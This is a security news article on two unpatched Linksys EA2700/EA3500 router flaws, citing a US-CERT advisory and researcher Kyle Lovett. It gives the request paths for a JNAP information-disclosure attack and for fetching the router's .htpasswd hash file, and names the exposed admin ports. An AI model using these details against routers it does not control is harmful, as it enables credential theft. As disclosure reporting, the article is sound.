Two versions of popular consumer and small office Linksys routers remain vulnerable to a pair of vulnerabilities recently patched in other models of the Belkin-owned networking gear.
Linksys EA2700 and EA3500 routers running Linksys SMART Wi-Fi firmware have yet to be patched against vulnerabilities that put user credentials at risk, thus allowing outside access to the router.
Researcher Kyle Lovett reported the vulnerabilities in July; Linksys patched the bugs on Oct. 23 in E4200v2, EA4500, EA6200, EA6300, EA6400, EA6500, EA6700, and EA6900 models. Public exploits for the vulnerabilities in the EA3500 and EA6500 models were available on a Turkish hacker site in mid-September.
Both of the vulnerabilities were remotely exploitable and did not require authentication; Linksys encourages SOHO and consumers to turn on automatic updates in the available models.
“Linksys has an option to have automatic updates, which makes the patches hit far more units than other SOHO models out there,” Lovett said.
The vulnerabilities were explained late last week in an advisory released by US-CERT. The most serious of the two, Lovett said, is an information disclosure vulnerability whereby a remote attacker can send malicious JNAP calls in a specially crafted HTTP POST request to the router’s IP address/JNAP/.
“Depending on the JNAP action that is called, the attacker may be able to read or modify sensitive information on the router,” the advisory said.
The router exposes a number of ports by default to the wide area network. Port 10080 and 52000 expose the router’s administrative interface to users.
“If the end user changes the default password, the JNAP issue I think is more serious due to the vast numbers of different pieces of information disclosure that the different JNAP POST calls allow for,” Lovett said. “Once an attacker knows which X-JNAP-Action to call, it’s only a matter of crafting the correct POST body.”
The other bug is a key management error that allows an attacker on the local network to read the router’s .htpassword file. The attacker would need only to request http://<router IP>.htpasswd; the file contains the MD5 hash of the administrator password and other information needed to read the password.
“The htpasswd can be as easy, remote or local, as typing in http://IP/.htpasswd,” Lovett said. “Cracking the password depends, obviously on a couple of different factors.”
Home and small office routers have been a favorite target for black hats and researchers alike. Researchers at Rapid7 recently uncovered a security issue in NAT-PMP protocol implementations that put more than 1.2 million routers at risk to attack. Hackers could exploit the vulnerabilities to redirect traffic, access network services, or learn device configuration details.
“If you look at the last 15 years, the vulnerability landscape has migrated from servers then to Web applications, then client side applications, and now network devices,” said Rapid7 chief security officer HD Moore. “If you look at all the work Microsoft put into networking stacks and product security, the same type of effort was not put into embedded device security at all. Not to mention that it’s a huge pain in the butt to update, there are slow update cycles and the ecosystem is very complex.”
The annual DEF CON security conference this summer attempted to shine harsher light on the issue when it hosted a hacking contest called SOHOpelessly Broken. Researchers were tasked with finding previously unreported security vulnerabilities in popular home routers and did not disappoint, turning in 15, including seven that fully compromised the router in question, and one that could lead to corruption of an internal network.